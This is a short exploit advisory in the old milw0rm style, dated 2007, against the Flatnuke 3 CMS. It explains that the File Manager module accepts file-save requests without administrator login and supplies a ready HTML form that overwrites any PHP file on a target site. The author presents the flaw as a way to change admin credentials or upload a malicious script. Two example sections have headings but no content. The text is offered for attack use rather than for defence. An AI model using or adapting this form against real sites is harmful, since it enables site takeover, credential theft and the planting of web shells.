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Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Flatnuke 3 Remote Command Execution / Privilege Escalation
#By KiNgOfThEwOrLd
Corrupted Module: File Manager
Flatnuke doesn't use any database, so the registred users informations
are located in a php file like
/flatnuke3/misc/fndatabase/users/username.php . By the file manager
module, the administrator, can upload, make, edit or delete some files,
only while he's logging in. By the way, making a post whit the same
request of that module, we can replace or edit a file, for example an
user profile. So, there are a lot of way to exploit this vulnerability,
we can edit the admin credentials, we can upload a malicious php script,
and much more... But to exploit this vulnerability, we need to know the
script path. We can get it generating a full path disclosure.
Full Path Disclosure Example:
File Replace Exploit:
<form method="post" action="http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&op="><textarea id="body" name="body" cols="90" rows="35">
</textarea><br><input value="Save" type="submit"><input type="reset">
<input name="opmod" value="save" type="hidden">
<input name="ffile" value="[file_name].php" type="hidden">
<input name="dir" value="/[script_path]/[file_path]" type="hidden"><input class="button" onclick="history.back()" value="Annulla" type="button"></form>
User Credential View/Edit Exploit:
Or, for example u can view and edit a file located on the server:
Do you wanna another way to exploit this vuln? Use your brain! :P
# milw0rm.com [2007-10-23]